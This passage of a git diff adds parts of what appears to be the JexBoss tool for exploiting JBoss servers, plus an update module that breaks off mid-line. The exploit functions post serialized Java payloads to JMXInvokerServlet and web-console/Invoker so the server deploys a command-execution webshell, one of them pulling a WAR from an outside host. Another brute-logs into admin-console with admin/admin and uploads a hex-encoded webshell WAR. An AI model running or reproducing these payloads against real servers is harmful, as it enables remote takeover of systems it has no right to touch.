"\x56\x65\x72\x73\x69\x6f\x6e\x20\x3e\x20\x76\x65\x72\x73\x69\x6f\x6e\x29\x7b" + 
"\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x28\x22\x50\x6c\x65\x61\x73\x65\x20" + "\x6e\x6f\x74\x65\x3a\x20\x74\x68\x65\x72\x65\x20\x69\x73\x20\x61\x6e\x20\x75" + "\x70\x64\x61\x74\x65\x20\x74\x6f\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x4a\x53" + "\x50\x20\x57\x65\x62\x73\x68\x65\x6c\x6c\x2e\x20\x57\x65\x20\x72\x65\x63\x6f" + "\x6d\x6d\x65\x6e\x64\x20\x74\x68\x61\x74\x20\x79\x6f\x75\x20\x72\x65\x72\x75" + "\x6e\x20\x74\x68\x65\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x74\x6f\x20\x72\x65" + "\x64\x65\x70\x6c\x6f\x79\x20\x74\x68\x65\x20\x6e\x65\x77\x20\x76\x65\x72\x73" + "\x69\x6f\x6e\x20\x6f\x66\x20\x77\x65\x62\x73\x68\x65\x6c\x6c\x20\x69\x6e\x20" + "\x4a\x42\x6f\x73\x73\x20\x73\x65\x72\x76\x65\x72\x20\x74\x65\x73\x74\x65\x64" + "\x2e\x22\x29\x3b\x20\x7d\x20\x7d\x20\x65\x6c\x73\x65\x20\x69\x66\x20\x28\x73" + "\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x64\x22\x29\x20\x7c\x7c" + "\x20\x73\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e" + "\x66\x69\x67\x22\x29\x29\x20\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55" + "\x70\x64\x61\x74\x65\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65" + "\x61\x6d\x28\x29\x3b\x20\x7d\x20\x7d\x20\x7d\x20\x63\x61\x74\x63\x68\x28\x45" + "\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x7b\x6f\x75\x74\x2e\x70\x72\x69" + "\x6e\x74\x6c\x6e\x28\x22\x45\x72\x72\x6f\x72\x20\x63\x68\x65\x63\x6b\x69\x6e" + "\x67\x20\x66\x6f\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3b\x7d\x20\x74" + "\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70\x3b\x20\x69\x66\x20" + "\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79" + "\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f\x4c\x6f\x77\x65\x72" + "\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x77\x69\x6e" + "\x22\x29\x20\x3e\x20\x30\x20\x7c\x7c\x20\x21\x53\x79\x73\x74\x65\x6d\x2e\x67" + "\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6c\x65\x2e\x73\x65" + 
"\x70\x61\x72\x61\x74\x6f\x72\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x2f" + "\x22\x29\x29\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65" + "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d" + "\x64\x2e\x65\x78\x65\x20\x2f\x43\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65" + "\x6c\x73\x65\x20\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67" + "\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68" + "\x29\x3b\x20\x7d\x20\x62\x72\x20\x3d\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65" + "\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74" + "\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72\x28\x70\x2e\x67\x65\x74\x49" + "\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x29\x3b\x20\x53\x74\x72" + "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x62\x72\x2e\x72\x65\x61\x64\x4c" + "\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20\x28\x64\x69\x73\x72\x20" + "\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e" + "\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x62" + "\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20\x7d\x63\x61" + "\x74\x77\xbc\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x20" + "\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e\x6b\x6e" + "\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x20\x7d\x20\x7d" + "\x20\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f" + "\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05" + "\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e" + "\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b" + "\x47\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c" + "\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00" + 
"\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x21\x96\x59" + "\xec\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67" + "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49" + "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85" + "\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00" + "\x04\x70\x78") + + headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue", + "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + result = r.status + + if result == 401: + print(" Retrying...") + pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + return get_successfully(url, "/jexinv3/jexinv3.jsp") + + +def exploit_web_console_invoker(url): + """ + Exploits web console invoker + Does not work in JBoss 5 (bug in JBoss5) + :param url: The URL to exploit + :return: The HTTP status code + """ + payload = ( + "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e" + "\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f" + "\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f" + "\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e" + "\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" + "\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c" + "\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00" + "\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61" + "\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72" + 
"\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61" + "\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65" + "\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75" + "\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65" + "\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00" + "\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25" + "\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64" + "\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74" + "\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c" + "\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f" + "\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01" + "\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61" + "\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0f\x2f\x72\x6e\x70\x2f\x6a\x65\x78" + "\x77\x73\x33\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70" + "\x70\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53" + "\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70" + "\x00\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c" + "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e" + "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15" + "\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74" + "\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c" + "\x6f\x79\x65\x72\x78") + + headers = { + "Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation", + "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, 
len(user_agents) - 1)]} + r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + result = r.status + if result == 401: + print(" Retrying...") + pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + return get_successfully(url, "/jexws3/jexws3.jsp") + + +def get_viewstat_admin_console(page): + page = str(page).replace("\\n", "\n") + for i in page.split('\n'): + if 'javax.faces.ViewState' in i: + if i.count('value') ==1: + return i.split("value=\"")[1].split("\"")[0] + else: + return i.split("value=\"")[2].split("\"")[0] + + +def get_boundary_admin_console(jboss_version, state, payload): + + boundary = "-----------------------------8994251555011888521050172030\r\n" + if jboss_version == 6: + data = boundary + data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n" + data += "\r\n" + data += "createContentForm\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload + "\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_328868266\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_-1257012452\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n" + data += "\r\n" + data += "Continue\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n" + data += "\r\n" + data += state + "\r\n" + data += "-----------------------------8994251555011888521050172030--\r\n" + return data + elif jboss_version == 5: + data = boundary + data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n" + data += "\r\n" + data += 
"createContentForm\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload + "\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-1995377939_328868266\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n" + data += "\r\n" + data += "Continue\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n" + data += "\r\n" + data += state + "\r\n" + data += "-----------------------------8994251555011888521050172030--\r\n" + return data + + +def url_encode(text): + if version_info[0] >= 3: + return quote(text) + else: + return urllib.quote_plus(text) + + +def exploit_admin_console(url): + """ + Exploits admin-console + tested and works in JBoss 5 and 6 + :param url: The URL to exploit + :return: The HTTP status code + """ + # Use default password for Jboss 5 and 6 + username = "admin" + password = "admin" + headers = { + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + r = pool.request('GET', url+"/admin-console/login.seam", headers=headers) + cookie = r.getheader('set-cookie').split(";")[0] + headers['Cookie'] = cookie + state = get_viewstat_admin_console(r.data) + #payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login" + # "&javax.faces.ViewState=%s" % (username, password, state)) + payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state) + headers['Content-Type'] = "application/x-www-form-urlencoded" + print(GREEN + "\n * Info: Trying to perform 
authentication with default credentials..." +ENDC) + r = pool.request('POST', url+"/admin-console/login.seam", body=payload, headers=headers, redirect=False) + state = get_viewstat_admin_console(r.data) + if r.status == 302: + print(GREEN + " * Info: Successfully logged in! Wait..." + ENDC) + location = r.getheader('Location') + conversation_id = location.split('=')[1] + r = pool.request('GET', location, headers=headers) + if state == None: + sleep(7) + r = pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR" + "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers) + conversation_id = str(int(conversation_id)+1) + r = pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType" + "Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId=" + + conversation_id, headers=headers) + state = get_viewstat_admin_console(r.data) + + headers['Content-Type'] = "multipart/form-data; boundary=---------------------------8994251555011888521050172030" + + payload = ("\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x4d\x45\x54\x41\x2d\x49\x4e" + "\x46\x2f\xfe\xca\x00\x00\x03\x00\x50\x4b\x07\x08\x00\x00\x00\x00\x02\x00\x00" + "\x00\x00\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4d\x45\x54" + "\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e\x4d\x46\xf3\x4d" + "\xcc\xcb\x4c\x4b\x2d\x2e\xd1\x0d\x4b\x2d\x2a\xce\xcc\xcf\xb3\x52\x30\xd4\x33" + "\xe0\xe5\x72\x2e\x4a\x4d\x2c\x49\x4d\xd1\x75\xaa\x04\x09\x58\xe8\x19\xc4\x9b" + "\x9b\x2b\x68\xf8\x17\x25\x26\xe7\xa4\x2a\x38\xe7\x17\x15\xe4\x17\x25\x96\x00" + "\x95\x6b\xf2\x72\xf1\x72\x01\x00\x50\x4b\x07\x08\x05\xa0\x0e\xbc\x43\x00\x00" + 
"\x00\x44\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x6a\x65\x78" + "\x77\x73\x33\x2e\x6a\x73\x70\x95\x55\x5f\x6f\x1a\x39\x10\x7f\xbf\x4f\x31\xb1" + "\x94\xca\x94\xb2\xb4\xba\x97\x53\x08\xd1\xa5\xb9\x54\x69\x14\xe9\x22\x52\xae" + "\x0f\xa7\xaa\x32\xbb\x03\xeb\x74\xd7\xf6\xd9\xb3\x05\x94\xf2\xdd\x6f\xec\x05" + "\x02\x85\x6b\x75\x2f\xbb\xc6\x33\x9e\x9d\xf9\xfd\x31\xe7\xa7\xbf\x83\x53\x33" + "\x04\x5d\x3b\xeb\x69\x28\x1e\xd5\x57\x95\x35\xa4\xab\xec\xe5\xab\xb4\xd6\x96" + "\x57\x90\x96\x06\x29\x7b\x29\x52\xfe\xb5\xc9\x6d\xa1\xcd\x6c\x28\xc6\x1f\xde" + "\xf5\x7e\x13\xa7\x17\x70\xee\x3c\xf2\xf3\x14\xb4\x21\xf8\x8a\x3e\x68\x6b\x60" + "\x08\xbf\x0e\x40\x4f\x41\x7a\xfc\xa7\xc1\x40\xd9\x0c\xe9\x5e\x79\x55\x23\xa1" + "\x97\xc2\x39\x27\x3a\x70\x32\x04\xd3\x54\x55\x07\x9e\x60\x62\x6d\x85\xca\x40" + "\x5e\x62\xfe\x65\xec\x0a\x45\x18\x06\x70\x43\xe4\xc6\xa3\xbb\x2b\x6b\x0c\xe6" + "\x14\xeb\xe6\xbc\xbc\xda\xc9\x81\xb6\xc4\x00\xde\x36\xd3\x29\x7a\x2c\x46\xa8" + "\x0a\xf4\x30\xf1\xdb\x88\xc7\xe0\xac\x09\x98\x05\x24\xae\x44\x68\xe8\xc3\xd2" + "\xa1\x14\x84\x0b\xea\x97\x54\x57\xa2\x73\xd0\xeb\x4d\x2a\x23\x45\xea\xa7\xd7" + "\xb4\x1f\x7b\x6e\x19\x5e\xbc\x80\x9f\x67\x67\x9c\xa1\xaa\x20\xc5\x94\x9f\x28" + "\x3a\x9d\xa7\xbd\xf9\xb8\xc3\x14\x18\xc0\x0a\xf9\x05\x07\x51\xf2\x0d\x07\x8f" + "\x8c\x2c\x0f\x80\xe9\x80\xc1\x39\xf0\x96\x14\x25\xc7\xce\xfa\xfd\x39\x4e\x42" + "\x89\x55\x95\x3d\xe2\x62\x62\x43\x88\x2c\xf6\x1f\x83\xfb\xbc\xa6\x28\xa3\x05" + "\x71\x8b\xd6\xa1\x79\x2e\x23\x19\x89\x15\x3c\x90\x67\x8a\x21\x94\xfc\xa9\x1f" + "\xf0\x37\xd8\x24\x56\x2a\xd0\x8d\x6d\x7c\xea\x32\xb6\x17\x7b\xf9\x83\x7b\x95" + "\x9d\x8c\x6c\x9b\xc4\xcb\xe0\x2a\x4d\x52\x9c\x89\xce\xdf\xaf\x3f\x75\x45\x99" + "\x55\x76\xc6\x1d\x78\x74\x95\xca\xf1\xb2\xaa\xa4\x00\xf1\x0a\x44\x2f\x96\x26" + "\xbf\x7c\x4a\xa4\xec\x63\xd2\x82\x12\x81\xfc\x0e\x95\xc8\xee\xa8\xed\xf5\xde" + 
"\xf3\x50\x9e\x96\x52\x8c\x03\xfa\xde\xe5\x8c\x19\xe7\xba\x47\xf8\xba\xb1\x81" + "\x31\xe8\x8a\xf3\x9e\xe8\xee\x84\x47\x58\x5b\xc2\xcb\xa2\xf0\xb2\xb3\x96\xc6" + "\x49\x1c\xe9\x9d\xae\x70\x4d\xf2\x67\xd1\xdd\x9b\x9a\xb9\x5e\xe8\x40\x41\x46" + "\x92\xef\x79\x60\xfa\xe8\x35\x43\x05\xf3\xf6\x35\x4c\xfc\xec\x04\xfe\xab\xce" + "\x60\x7d\x22\xcb\x2b\x1b\x30\xf2\x31\xd9\x9c\xde\x97\x78\x02\xf9\xbd\x71\x0d" + "\x31\xc0\xa8\xea\xf5\xee\x01\x2e\x3c\xcf\x4e\x16\xf7\x17\x27\x62\xa7\xc6\xcf" + "\xfe\xb5\x75\xeb\x7b\xf6\xc5\x8c\xbf\xea\x94\x0f\xc8\x3f\xe4\xc4\x33\x31\xaa" + "\xb8\xd3\x06\x9f\xa9\x03\xa6\xee\xcd\xa7\x35\x24\xbb\x05\x2e\x36\xc6\xe7\xe9" + "\x6d\x43\x99\x8b\x83\x4a\x71\xcf\x9e\x66\x61\x1b\x46\xf3\x0c\xa8\xe4\xe6\x41" + "\x07\x60\x9b\xb7\x16\x01\xb2\x70\x8b\x8b\xb7\xac\x4e\xb8\x7d\xb8\x87\x8f\x1b" + "\xc9\xf2\x8a\xe9\xca\x6d\x5d\xa3\x29\xf8\xa0\x22\x58\xda\x86\xb7\x7c\x63\x62" + "\x9d\xed\x29\x2e\xc0\x80\xb0\x80\xec\x32\xed\x47\x4c\x36\x57\x90\x9d\xc2\xc6" + "\x03\x3c\x30\xdc\xa6\x03\x2c\x08\x8e\x03\x03\x43\x58\x64\x22\xc9\x7d\x05\xc9" + "\x7e\x71\xa6\x50\x66\x0c\x20\x29\x6d\xd8\xb5\xba\x60\xc3\x7f\xfb\x06\xfb\x9b" + "\x8e\xd7\x53\xcd\xc2\x8d\xd7\xd6\x4f\xd1\x6e\xeb\xaf\x20\x57\x94\x97\xf2\x7a" + "\x91\xa3\x4b\xf7\x18\x4b\x78\x8b\x53\x65\xa4\xb8\xf6\xde\xfa\xd6\xff\xd1\x51" + "\x53\xfe\xb1\xbd\x46\x06\xab\xe8\x06\x88\xba\xb2\x39\xf2\x10\xae\x25\xe0\x61" + "\xc9\x43\xd4\xc9\x99\x5b\xc5\x5b\xf6\x39\x9b\x54\x44\xe3\xdd\xd9\x39\xfa\x2b" + "\x15\x55\x94\x69\x53\xe0\xe2\xcf\xa9\x14\x73\x6d\x78\xaa\x0b\x78\x1d\x27\x3b" + "\x39\x56\x62\xca\x2a\x67\x37\xb1\x12\x14\x59\xbf\x73\x8b\xf5\xd3\x0d\xe6\x58" + "\x2d\xa3\xc6\x90\xae\x31\x79\xa5\x5d\xca\x68\x00\xcc\x59\xd5\x75\x11\x57\xd0" + "\xbf\x02\xd1\x0d\x65\x02\x60\x7d\xbb\xfd\xf8\xe4\x3a\xf7\xff\xa9\xdd\x1d\x95" + "\xf7\xfa\x5a\x2a\x74\x88\xc5\xf6\x94\xcc\xf6\x2a\x79\x3e\x90\x29\xb8\xf3\x07" + "\xb4\xcb\x46\x8c\x71\xe6\xf1\xf3\xcc\xe6\x21\x99\xdf\x15\x10\x63\xf3\xc5\xd8" + 
"\x79\xfc\xbb\xaa\x6b\x65\x9e\x85\x76\x7a\xf1\xcb\xbf\x50\x4b\x07\x08\x25\x39" + "\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x50\x4b\x01\x02\x14\x00\x14\x00\x08" + "\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00" + "\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d" + "\x45\x54\x41\x2d\x49\x4e\x46\x2f\xfe\xca\x00\x00\x50\x4b\x01\x02\x14\x00\x14" + "\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x05\xa0\x0e\xbc\x43\x00\x00\x00\x44\x00" + "\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3d\x00\x00" + "\x00\x4d\x45\x54\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e" + "\x4d\x46\x50\x4b\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48\x25" + "\x39\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x6a\x65\x78\x77\x73\x33\x2e\x6a\x73" + "\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xb5\x00\x00\x00\x6a\x04" + "\x00\x00\x00\x00") + + data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload) + try: + r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers,body=data) + if r.status != 302: + data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload) + r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data) + except: + sleep(1) + + return get_successfully(url, "/jexws3/jexws3.jsp") + + else: + print(RED + "\n * Authentication failed!" + ENDC) + return 404 diff --git a/Jboss_Verify_EXploitation/_updates.py b/Jboss_Verify_EXploitation/_updates.py new file mode 100644 index 0000000..5d2e6b4 --- /dev/null +++ b/Jboss_Verify_EXploitation/_updates.py 
@@ -0,0 +1,137 @@ +# -*- coding: utf-8 -*- +""" +Module for managing updates to the JexBoss +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + +from jexboss import __version +from sys import version_info +import os +import shutil +from zipfile import ZipFile +try: + from urllib3 import disable_warnings, PoolManager + from urllib3.util.timeout import Timeout + disable_warnings() +except ImportError: + print(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + exit(0) + +timeout = Timeout(connect=3.0, read=6.0) +pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + + + + +def auto_update(): + """ + Download and deploy the latest version + :return: True if successfully updated + """ + url = 'https://github.com/joaomatosf/jexboss/archive/master.zip' + + # backup of prior version + if os.path.exists('old_version'): + shutil.rmtree('old_version') + shutil.copytree(".", "." + os.path.sep + "old_version") + + # download and extract of new version + print(GREEN + " * Downloading the new version from %s." %url +ENDC ) + r = pool.request('GET', url) + if r.status != 200: + print(RED + " * Error: Could not complete the download of the new version. 
Check your internet connection." + ENDC) + return False + with open('master.zip', 'wb') as f: + f.write(r.data) + z = ZipFile('master.zip', 'r') + print(GREEN + " * Extracting new version..." +ENDC) + z.extractall(path='.') + z.close() + os.remove('master.zip') + path_new_version = '.' + os.path.sep + 'jexboss-master' + print(GREEN + " * Replacing the current version with the new version..." + ENDC) + for root, dirs, files in os.walk(path_new_version): + for file in files: + old_path = root.replace(path_new_version, '.') + os.path.sep + old_file = root.replace(path_new_version, '.') + os.path.sep + file + new_file = os.path.join(root, file) + + if not os.path.exists(old_path): + os.makedirs(old_path) + + shutil.move(new_file, old_file) + # remove extracted directory of the new version + shutil.rmtree('.'+os.path.sep+'jexboss-master') + + return True + + +def check_updates(): + """ + Checks if there is new version available + :return: boolean if there updates + """ + url = 'http://joaomatosf.com/rnp/releases.txt' + print(BLUE + " * Checking for updates in: %s **\n" % url + ENDC) + header = {"User-Agent": "Checking for updates"} + r = pool.request('GET', url, redirect=False, headers=header) + + if r.status != 200: + print(RED + " * Error: could not check for updates ...\n" + ENDC) + return False + else: + current_version = __version + link = 'https://github.com/joaomatosf/jexboss/archive/master.zip' + date_last_version = '' + notes = [] + # search for new versions + resp = str(r.data).replace('\\n','\n') + for line in resp.split('\n'): + if "#" in line: + continue + if 'last_version' in line: + last_version = line.split()[1] + elif 'date:' in line: + date_last_version = line.split()[1] + elif 'link:' in line: + link = line + elif '* ' in line: + notes.append(line) + elif 'version:' in line and 'last_' not in line: + break + # compare last_version with current version + tup = lambda x: [int(y) for y in (x + '.0.0.0').split('.')][:3] + if tup(last_version) > 
